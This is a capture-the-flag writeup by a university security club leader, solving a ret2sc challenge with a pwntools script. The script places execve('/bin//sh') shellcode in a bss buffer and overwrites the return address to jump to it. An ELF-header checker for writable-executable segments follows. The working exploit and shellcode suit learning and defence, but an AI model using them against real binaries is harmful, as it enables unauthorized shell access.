Pwnctf ret2sc Writeup

kazma, founder and president of the NCKU Information Security Club

ret2sc

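For this challenge, you just write the shellcode into name and then jump to it. Note, however, that on newer operating systems the bss segment does not have x (execute) permission. Here is exploit.py: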

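from pwn import *

# Start the challenge binary locally
r = process('./ret2sc')

# Address of the global name buffer (in bss)
name = 0x601080
# execve("/bin//sh") shellcode from the Exploit-DB entry linked below
sc = b"\x50\x48\x31\xd2\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\xb0\x3b\x0f\x05"

# First prompt: store the shellcode in name
r.sendlineafter(b':', sc)
# Second prompt: 0x28 bytes of padding, then overwrite the return address with name
r.sendlineafter(b':', b'a'*0x28 + p64(name))
r.interactive()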

The shellcode was taken from here:
https://www.exploit-db.com/shellcodes/49770

Pwned !!!
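The remark about bss lacking x permission can be checked from the defender's side by reading a binary's ELF program headers. The following is an added example, not part of the original writeup: it flags writable-and-executable LOAD segments and an executable GNU_STACK request, and reports whether a given address (here the writeup's name, 0x601080) is mapped executable by the file itself. The sample ELF image and its segment layout are constructed for illustration.

```python
import struct

PT_LOAD, PT_GNU_STACK = 1, 0x6474E551
PF_X, PF_W, PF_R = 1, 2, 4

def program_headers(elf: bytes):
    """Yield (p_type, p_flags, p_vaddr, p_memsz) for a little-endian ELF64 image."""
    if elf[:4] != b"\x7fELF" or elf[4] != 2 or elf[5] != 1:
        raise ValueError("expected a little-endian ELF64 image")
    (e_phoff,) = struct.unpack_from("<Q", elf, 0x20)
    e_phentsize, e_phnum = struct.unpack_from("<HH", elf, 0x36)
    for i in range(e_phnum):
        p_type, p_flags, _off, p_vaddr, _pa, _fsz, p_memsz, _al = struct.unpack_from(
            "<IIQQQQQQ", elf, e_phoff + i * e_phentsize)
        yield p_type, p_flags, p_vaddr, p_memsz

def audit(elf: bytes, addr: int):
    """Return (findings, addr_exec): W+X findings and whether addr lies in an X segment."""
    findings, addr_exec = [], False
    for p_type, p_flags, p_vaddr, p_memsz in program_headers(elf):
        if p_type == PT_LOAD:
            if p_flags & PF_W and p_flags & PF_X:
                findings.append(f"LOAD segment at {p_vaddr:#x} is writable and executable")
            if p_vaddr <= addr < p_vaddr + p_memsz and p_flags & PF_X:
                addr_exec = True
        elif p_type == PT_GNU_STACK and p_flags & PF_X:
            # Executable stack request; some kernels then also treat other
            # readable mappings (such as bss) as executable.
            findings.append("GNU_STACK requests an executable stack")
    return findings, addr_exec

def build_sample(stack_flags: int) -> bytes:
    """Constructed sample: ELF64 header plus three program headers, no section data."""
    ehdr = b"\x7fELF\x02\x01\x01" + b"\0" * 9
    ehdr += struct.pack("<HHIQQQIHHHHHH", 2, 0x3E, 1, 0x400000, 64, 0, 0, 64, 56, 3, 0, 0, 0)
    ph = lambda t, f, va, sz: struct.pack("<IIQQQQQQ", t, f, 0, va, va, sz, sz, 0x1000)
    return (ehdr + ph(PT_LOAD, PF_R | PF_X, 0x400000, 0x1000)    # text (constructed)
                 + ph(PT_LOAD, PF_R | PF_W, 0x601000, 0x1000)    # data/bss (constructed)
                 + ph(PT_GNU_STACK, stack_flags, 0, 0))

if __name__ == "__main__":
    for label, flags in (("execstack", PF_R | PF_W | PF_X), ("hardened", PF_R | PF_W)):
        print(label, audit(build_sample(flags), 0x601080))
```

A binary that passes this check (no findings, and the data address not executable) leaves injected bytes in name as non-executable data on a system that enforces NX.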

  • Title: Pwnctf ret2sc Writeup
  • Author: kazma
  • Created at : 2023-12-20 22:57:23
  • Updated at : 2023-12-20 23:03:09
  • Link: https://kazma.tw/2023/12/20/Pwnctf-ret2sc-Writeup/
  • License: This work is licensed under CC BY-NC-SA 4.0.